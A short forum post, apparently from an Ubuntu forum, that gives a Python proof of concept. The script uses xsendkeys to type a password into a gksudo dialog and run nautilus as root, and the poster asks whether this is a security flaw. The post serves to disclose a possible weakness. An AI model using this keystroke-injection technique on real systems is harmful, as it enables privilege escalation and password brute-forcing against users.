In the light of recently discovered windows flaw, I tried similar thing with ubuntu and it works. for example this python script
Code:
import time
import subprocess
time.sleep(5)
subprocess.Popen(["gksudo", "nautilus"]); #could be more interesting
time.sleep(5)
subprocess.Popen(["xsendkeys", '"p+p+a+s+s+w+o+r+d+Return+Return"'])
If gksudo dialog don't lose focus during those 5 seconds, password gets written and program is launched under root privileges, so if some program manages to keylog user password it could do anything on your system. Also some malicious program could try to brute-force your password this way, I think
Why xsendkeys are allowed to interact with gksudo dialog? isn't this some sort of security flaw?
PS. xsendkeys works buggy for me, first and last chars are skipped
Bookmarks